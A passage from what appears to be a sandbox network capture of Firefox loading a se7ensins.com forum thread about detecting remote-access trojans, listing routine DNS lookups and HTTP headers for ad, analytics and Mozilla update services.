
Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:32 GMT
content-type: text/html; charset=utf-8
content-length: 0
cache-control: no-cache, no-store, must-revalidate
DNS

eu-eb2.3lift.com

firefox.exe

Remote address:

8.8.8.8:53

Request

eu-eb2.3lift.com

IN A

Response

eu-eb2.3lift.com

IN A

76.223.111.18

eu-eb2.3lift.com

IN A

13.248.245.213
DNS

eu-eb2.3lift.com

firefox.exe

Remote address:

8.8.8.8:53

Request

eu-eb2.3lift.com

IN AAAA

Response
DNS

rt3013.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

rt3013.infolinks.com

IN A

Response

rt3013.infolinks.com

IN A

172.66.42.247

rt3013.infolinks.com

IN A

172.66.41.9
DNS

rt3013.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

rt3013.infolinks.com

IN A

Response

rt3013.infolinks.com

IN A

172.66.42.247

rt3013.infolinks.com

IN A

172.66.41.9
GET

https://cdn.ampproject.org/rtv/012405101652000/amp4ads-v0.mjs

firefox.exe

Remote address:

142.250.187.225:443

Request

GET /rtv/012405101652000/amp4ads-v0.mjs HTTP/2.0
host: cdn.ampproject.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://cdn.ampproject.org/rtv/012405101652000/v0/amp-ad-exit-0.1.mjs

firefox.exe

Remote address:

142.250.187.225:443

Request

GET /rtv/012405101652000/v0/amp-ad-exit-0.1.mjs HTTP/2.0
host: cdn.ampproject.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://cdn.ampproject.org/rtv/012405101652000/v0/amp-fit-text-0.1.mjs

firefox.exe

Remote address:

142.250.187.225:443

Request

GET /rtv/012405101652000/v0/amp-fit-text-0.1.mjs HTTP/2.0
host: cdn.ampproject.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://cdn.ampproject.org/rtv/012405101652000/v0/amp-analytics-0.1.mjs

firefox.exe

Remote address:

142.250.187.225:443

Request

GET /rtv/012405101652000/v0/amp-analytics-0.1.mjs HTTP/2.0
host: cdn.ampproject.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://cdn.ampproject.org/rtv/012405101652000/v0/amp-form-0.1.mjs

firefox.exe

Remote address:

142.250.187.225:443

Request

GET /rtv/012405101652000/v0/amp-form-0.1.mjs HTTP/2.0
host: cdn.ampproject.org
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

rt3013.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

rt3013.infolinks.com

IN AAAA

Response
GET

https://widgets.outbrain.com/outbrain.js

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /outbrain.js HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/x-javascript
content-length: 89174
x-traceid: bbbb8c850c6334477f41ded1737c4964
etag: "27-HW9qWmqnHyfNPXUMvpoaaZmUKas"
last-modified: Wed, 22 May 2024 12:47:07 GMT
cache-control: max-age=14500
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
date: Sun, 26 May 2024 02:06:49 GMT
edge-cache-tag: widget-cheetah
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/nanoWidget/externals/topics/topics.html?r=https%3A%2F%2Fwww.se7ensins.com

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /nanoWidget/externals/topics/topics.html?r=https%3A%2F%2Fwww.se7ensins.com HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: text/html
etag: "a52151dbf5b2ca563e40ccca1ab8228c:1716383873.337489"
last-modified: Wed, 22 May 2024 12:46:14 GMT
server: AkamaiNetStorage
content-length: 667
cache-control: max-age=14400
expires: Sun, 26 May 2024 06:06:51 GMT
date: Sun, 26 May 2024 02:06:51 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widget-pixels.outbrain.com/widget/detect/px.gif?ch=1

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /widget/detect/px.gif?ch=1 HTTP/2.0
host: widget-pixels.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-length: 43
content-type: image/gif
etag: "ad4b0f606e0f8465bc4c4c170b37e1a3:1601475749.911431"
last-modified: Wed, 30 Sep 2020 14:22:29 GMT
server: AkamaiNetStorage
cache-control: max-age=2592000
expires: Tue, 25 Jun 2024 02:06:52 GMT
date: Sun, 26 May 2024 02:06:52 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/nanoWidget/externals/cookie/put.html

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /nanoWidget/externals/cookie/put.html HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: text/html
etag: "c0311cf15c21ddda054005e92fad3f9e:1716383869.850491"
last-modified: Wed, 22 May 2024 12:46:14 GMT
server: AkamaiNetStorage
content-length: 416
cache-control: max-age=604800
expires: Sun, 02 Jun 2024 02:06:56 GMT
date: Sun, 26 May 2024 02:06:56 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/nanoWidget/externals/cookie/test.html

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /nanoWidget/externals/cookie/test.html HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://widgets.outbrain.com/nanoWidget/externals/cookie/put.html
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: same-origin
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: text/html
etag: "48053d50141031b1511dbd30f9a31288:1716383870.567654"
last-modified: Wed, 22 May 2024 12:46:14 GMT
server: AkamaiNetStorage
content-length: 610
cache-control: max-age=604800
expires: Sun, 02 Jun 2024 02:06:56 GMT
date: Sun, 26 May 2024 02:06:56 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/widgetOBUserSync/obUserSync.html

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /widgetOBUserSync/obUserSync.html HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: text/html
etag: "d0fc5ac45325bf2052bda54e8042b25a:1715755156.527968"
last-modified: Thu, 09 May 2024 10:50:21 GMT
server: AkamaiNetStorage
vary: Accept-Encoding
content-encoding: gzip
cache-control: max-age=604800
expires: Sun, 02 Jun 2024 02:06:56 GMT
date: Sun, 26 May 2024 02:06:56 GMT
content-length: 6282
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/images/widgetIcons/ob_logo_67x12.png

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /images/widgetIcons/ob_logo_67x12.png HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: image/png
etag: "c52b07e749f7a09fa7b97b7e195e06ce:1708851052.798399"
last-modified: Sun, 25 Feb 2024 08:33:18 GMT
server: AkamaiNetStorage
content-length: 2326
cache-control: max-age=2592000
expires: Tue, 25 Jun 2024 02:07:00 GMT
date: Sun, 26 May 2024 02:07:00 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
GET

https://widgets.outbrain.com/images/widgetIcons/achoice.svg

firefox.exe

Remote address:

2.21.189.145:443

Request

GET /images/widgetIcons/achoice.svg HTTP/2.0
host: widgets.outbrain.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

accept-ranges: bytes
content-type: image/svg+xml
etag: "5ab8e16b5f46213840bcd403e349419c:1708851030.144644"
last-modified: Sun, 25 Feb 2024 08:33:18 GMT
server: AkamaiNetStorage
content-length: 990
cache-control: max-age=2592000
expires: Tue, 25 Jun 2024 02:07:00 GMT
date: Sun, 26 May 2024 02:07:00 GMT
timing-allow-origin: *
access-control-request-headers: X-OB-STG,X-OB-PRD
timing-allow-origin: *
access-control-allow-credentials: false
access-control-allow-methods: GET,POST
access-control-allow-origin: *
DNS

x.bidswitch.net

firefox.exe

Remote address:

8.8.8.8:53

Request

x.bidswitch.net

IN A

Response

x.bidswitch.net

IN CNAME

user-data-eu.bidswitch.net

user-data-eu.bidswitch.net

IN A

35.214.149.91
DNS

18.111.223.76.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.111.223.76.in-addr.arpa

IN PTR

Response

18.111.223.76.in-addr.arpa

IN PTR

a0f671730127a0812awsglobalacceleratorcom
DNS

18.111.223.76.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.111.223.76.in-addr.arpa

IN PTR
DNS

145.189.21.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.189.21.2.in-addr.arpa

IN PTR

Response

145.189.21.2.in-addr.arpa

IN PTR

a2-21-189-145deploystaticakamaitechnologiescom
DNS

225.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.187.250.142.in-addr.arpa

IN PTR

Response

225.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f11e100net
DNS

user-data-eu.bidswitch.net

firefox.exe

Remote address:

8.8.8.8:53

Request

user-data-eu.bidswitch.net

IN A

Response

user-data-eu.bidswitch.net

IN A

35.214.149.91
DNS

user-data-eu.bidswitch.net

firefox.exe

Remote address:

8.8.8.8:53

Request

user-data-eu.bidswitch.net

IN AAAA

Response
DNS

events.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

events.browsiprod.com

IN AAAA

Response
DNS

ai.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ai.browsiprod.com

IN A

Response

ai.browsiprod.com

IN A

18.66.171.93

ai.browsiprod.com

IN A

18.66.171.24

ai.browsiprod.com

IN A

18.66.171.74

ai.browsiprod.com

IN A

18.66.171.42
DNS

demand-engine.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

demand-engine.browsiprod.com

IN A

Response

demand-engine.browsiprod.com

IN A

3.162.140.75

demand-engine.browsiprod.com

IN A

3.162.140.20

demand-engine.browsiprod.com

IN A

3.162.140.128

demand-engine.browsiprod.com

IN A

3.162.140.107
DNS

ai.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ai.browsiprod.com

IN A

Response

ai.browsiprod.com

IN A

18.66.171.24

ai.browsiprod.com

IN A

18.66.171.42

ai.browsiprod.com

IN A

18.66.171.93

ai.browsiprod.com

IN A

18.66.171.74
DNS

ai.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ai.browsiprod.com

IN AAAA

Response
DNS

demand-engine.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

demand-engine.browsiprod.com

IN A

Response

demand-engine.browsiprod.com

IN A

3.162.140.128

demand-engine.browsiprod.com

IN A

3.162.140.75

demand-engine.browsiprod.com

IN A

3.162.140.107

demand-engine.browsiprod.com

IN A

3.162.140.20
DNS

aus5.mozilla.org

Request

aus5.mozilla.org

IN A

Response

aus5.mozilla.org

IN CNAME

balrog-aus5.r53-2.services.mozilla.com

balrog-aus5.r53-2.services.mozilla.com

IN CNAME

prod.balrog.prod.cloudops.mozgcp.net

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

demand-engine.browsiprod.com

Request

demand-engine.browsiprod.com

IN AAAA

Response
DNS

prod.balrog.prod.cloudops.mozgcp.net

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

91.149.214.35.in-addr.arpa

Request

91.149.214.35.in-addr.arpa

IN PTR

Response

91.149.214.35.in-addr.arpa

IN PTR

9114921435bcgoogleusercontentcom
DNS

201.181.244.35.in-addr.arpa

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

content-signature-2.cdn.mozilla.net

Request

content-signature-2.cdn.mozilla.net

IN A

Response

content-signature-2.cdn.mozilla.net

IN CNAME

content-signature-chains.prod.autograph.services.mozaws.net

content-signature-chains.prod.autograph.services.mozaws.net

IN CNAME

prod.content-signature-chains.prod.webservices.mozgcp.net

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

ciscobinary.openh264.org

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

2.18.121.197

a19.dscg10.akamai.net

IN A

2.18.121.79
GET

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

Request

GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 10 Apr 2024 18:44:28 GMT
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1712774667.41880
Content-Type: application/zip
X-Trans-Id: tx4d7e9d29965440bcb7668-0066189f1adfw1
Cache-Control: public, max-age=141989
Expires: Mon, 27 May 2024 17:33:19 GMT
Date: Sun, 26 May 2024 02:06:50 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

2.18.121.197

a19.dscg10.akamai.net

IN A

2.18.121.79
DNS

a19.dscg10.akamai.net

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:82::17c8:570c

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:82::17c8:56fb
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
DNS

197.121.18.2.in-addr.arpa

Request

197.121.18.2.in-addr.arpa

IN PTR

Response

197.121.18.2.in-addr.arpa

IN PTR

a2-18-121-197deploystaticakamaitechnologiescom
DNS

redirector.gvt1.com

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

widget-pixels.outbrain.com

Request

widget-pixels.outbrain.com

IN A

Response

widget-pixels.outbrain.com

IN CNAME

wildcard.outbrain.com.edgekey.net

wildcard.outbrain.com.edgekey.net

IN CNAME

e10883.g.akamaiedge.net

e10883.g.akamaiedge.net

IN A

2.21.189.145
DNS

r1---sn-aigl6ney.gvt1.com

Request

r1---sn-aigl6ney.gvt1.com

IN A

Response

r1---sn-aigl6ney.gvt1.com

IN CNAME

r1.sn-aigl6ney.gvt1.com

r1.sn-aigl6ney.gvt1.com

IN A

173.194.183.166
DNS

mcdp-chidc2.outbrain.com

Request

mcdp-chidc2.outbrain.com

IN A

Response

mcdp-chidc2.outbrain.com

IN CNAME

chidc2.outbrain.org

chidc2.outbrain.org

IN A

64.74.236.223
DNS

e10883.g.akamaiedge.net

Request

e10883.g.akamaiedge.net

IN AAAA

Response
DNS

r1.sn-aigl6ney.gvt1.com

Request

r1.sn-aigl6ney.gvt1.com

IN A

Response

r1.sn-aigl6ney.gvt1.com

IN A

173.194.183.166
DNS

tcheck.outbrainimg.com

Request

tcheck.outbrainimg.com

IN A

Response

tcheck.outbrainimg.com

IN CNAME

wildcard.outbrainimg.com.edgekey.net

wildcard.outbrainimg.com.edgekey.net

IN CNAME

e15144.d.akamaiedge.net

e15144.d.akamaiedge.net

IN A

2.21.190.8
DNS

r1.sn-aigl6ney.gvt1.com

Request

r1.sn-aigl6ney.gvt1.com

IN AAAA

Response

r1.sn-aigl6ney.gvt1.com

IN AAAA

2a00:1450:4009:11::6
DNS

e15144.d.akamaiedge.net

Request

e15144.d.akamaiedge.net

IN A

Response

e15144.d.akamaiedge.net

IN A

2.21.190.8
DNS

e15144.d.akamaiedge.net

Request

e15144.d.akamaiedge.net

IN AAAA

Response
DNS

206.187.250.142.in-addr.arpa

Request

206.187.250.142.in-addr.arpa

IN PTR

Response

206.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f141e100net
DNS

166.183.194.173.in-addr.arpa

Request

166.183.194.173.in-addr.arpa

IN PTR

Response

166.183.194.173.in-addr.arpa

IN PTR

lhr25s19-in-f61e100net
GET

https://ai.browsiprod.com/scroll/v2?pk=freestar&sk=se7ensins&h=22&gl=gb&os=Windows&d=Unknown%20Desktop%7CEmulator&dt=DESKTOP&ts=SEARCH&b=Firefox&pl=4542&mc=2871&sl=552&ul=0&to=5670&almi=0&v=scroll-predictor-v2&sf=0&iru=false&uva=0&uvs=0&vp=0&p=0&i=16&cs=0&cr=0

Request

GET /scroll/v2?pk=freestar&sk=se7ensins&h=22&gl=gb&os=Windows&d=Unknown%20Desktop%7CEmulator&dt=DESKTOP&ts=SEARCH&b=Firefox&pl=4542&mc=2871&sl=552&ul=0&to=5670&almi=0&v=scroll-predictor-v2&sf=0&iru=false&uva=0&uvs=0&vp=0&p=0&i=16&cs=0&cr=0 HTTP/2.0
host: ai.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-length: 34
date: Sun, 26 May 2024 02:06:52 GMT
x-powered-by: Express
etag: W/"22-+6RKEzTABd957aQFiABjZvnzkNU"
x-cache: Miss from cloudfront
via: 1.1 4ef5b810a61123a6a28e9f07ba613430.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P1
x-amz-cf-id: Q7wtfTtzkrox_pAQJ8ksOz_Qk43aC__D0vaqi9-K7Mr0gOuSIjSwwg==
access-control-allow-origin: *
access-control-expose-headers: *
GET

https://demand-engine.browsiprod.com/sra/desktop?sk=se7ensins&pk=freestar&pvid=303189fd-a9c4-4cd7-b79a-d4846aa4dd13&aid=se7ensins_1083544337_-1639449457&sid=2e1b67d2-99fe-4532-843c-a4f0ff6c12ea%26false%26false%26SEARCH%26gb%26desktop-4.25.21%26false&mch=2871&uid=ad500764-83a5-4341-aa19-1f7eda7f1ca5&pu=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pl=4542&d=false&sh=680&lid=8a4add73-10fb-429c-bd0d-c305fbeb7e91_A&ts=SEARCH&cc=gb&ir=false&ul=552&do=Windows&dd=Unknown%20Desktop%7CEmulator&dp=DESKTOP&dt=DESKTOP&db=Firefox&vpv=43117&lt=1.5&ais=0%7C%7C1%7C%7C2&fs=2.46%7C%7C4.95%7C%7C6.72&lls=false%7C%7Cfalse%7C%7Cfalse&sts=dynamic_mc%7C%7Cdynamic_mc%7C%7Cdynamic_mc&ets=b%7C%7Cb%7C%7Cb&als=808%7C%7C2183%7C%7C3155&pts=in-line%2Cwithin%20main%20content%7C%7Cin-line%2Cwithin%20main%20content%7C%7Cin-line%2Cwithin%20main%20content&ss=%7C%7C%7C%7C&dis=0%7C%7C1%7C%7C2&ac=0

Request

GET /sra/desktop?sk=se7ensins&pk=freestar&pvid=303189fd-a9c4-4cd7-b79a-d4846aa4dd13&aid=se7ensins_1083544337_-1639449457&sid=2e1b67d2-99fe-4532-843c-a4f0ff6c12ea%26false%26false%26SEARCH%26gb%26desktop-4.25.21%26false&mch=2871&uid=ad500764-83a5-4341-aa19-1f7eda7f1ca5&pu=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pl=4542&d=false&sh=680&lid=8a4add73-10fb-429c-bd0d-c305fbeb7e91_A&ts=SEARCH&cc=gb&ir=false&ul=552&do=Windows&dd=Unknown%20Desktop%7CEmulator&dp=DESKTOP&dt=DESKTOP&db=Firefox&vpv=43117&lt=1.5&ais=0%7C%7C1%7C%7C2&fs=2.46%7C%7C4.95%7C%7C6.72&lls=false%7C%7Cfalse%7C%7Cfalse&sts=dynamic_mc%7C%7Cdynamic_mc%7C%7Cdynamic_mc&ets=b%7C%7Cb%7C%7Cb&als=808%7C%7C2183%7C%7C3155&pts=in-line%2Cwithin%20main%20content%7C%7Cin-line%2Cwithin%20main%20content%7C%7Cin-line%2Cwithin%20main%20content&ss=%7C%7C%7C%7C&dis=0%7C%7C1%7C%7C2&ac=0 HTTP/2.0
host: demand-engine.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/json
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
content-encoding: gzip
date: Sun, 26 May 2024 02:06:52 GMT
x-cache: Miss from cloudfront
via: 1.1 66a9923479828976fab7994dba229152.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: BTMXgV4QWSyImxTtEBXsEDEcry7RfO4wAk6XnPEeIqGovKRPU7u1hw==
GET

https://tcheck.outbrainimg.com/tcheck/check/d3d3LnNlN2Vuc2lucy5jb20=

Request

GET /tcheck/check/d3d3LnNlN2Vuc2lucy5jb20= HTTP/1.1
Host: tcheck.outbrainimg.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.se7ensins.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Referer: https://www.se7ensins.com/
Connection: keep-alive

Response

HTTP/1.1 200 OK

Content-Type: application/json; charset=utf-8
Content-Length: 16
X-TraceId: 2656b72ea6107f5fa519c9ed48aa05d1
ETag: W/"10-us8lSJutAxKqLzf8c1+n5XstcwY"
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Cache-Control: max-age=1882
Expires: Sun, 26 May 2024 02:38:15 GMT
Date: Sun, 26 May 2024 02:06:53 GMT
Connection: keep-alive
Access-Control-Max-Age: 43200
Access-Control-Allow-Credentials: false
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Origin: *
DNS

93.171.66.18.in-addr.arpa

Request

93.171.66.18.in-addr.arpa

IN PTR

Response

93.171.66.18.in-addr.arpa

IN PTR

server-18-66-171-93dub56r cloudfrontnet
DNS

75.140.162.3.in-addr.arpa

Request

75.140.162.3.in-addr.arpa

IN PTR

Response

75.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-75dub56r cloudfrontnet
DNS

8.190.21.2.in-addr.arpa

Request

8.190.21.2.in-addr.arpa

IN PTR

Response

8.190.21.2.in-addr.arpa

IN PTR

a2-21-190-8deploystaticakamaitechnologiescom
DNS

mv.outbrain.com

Request

mv.outbrain.com

IN A

Response

mv.outbrain.com

IN CNAME

outbrain.map.fastly.net

outbrain.map.fastly.net

IN A

146.75.74.132
DNS

pbs-cs.yellowblue.io

Request

pbs-cs.yellowblue.io

IN A

Response

pbs-cs.yellowblue.io

IN A

54.170.105.17

pbs-cs.yellowblue.io

IN A

54.217.173.39

pbs-cs.yellowblue.io

IN A

52.18.156.159
GET

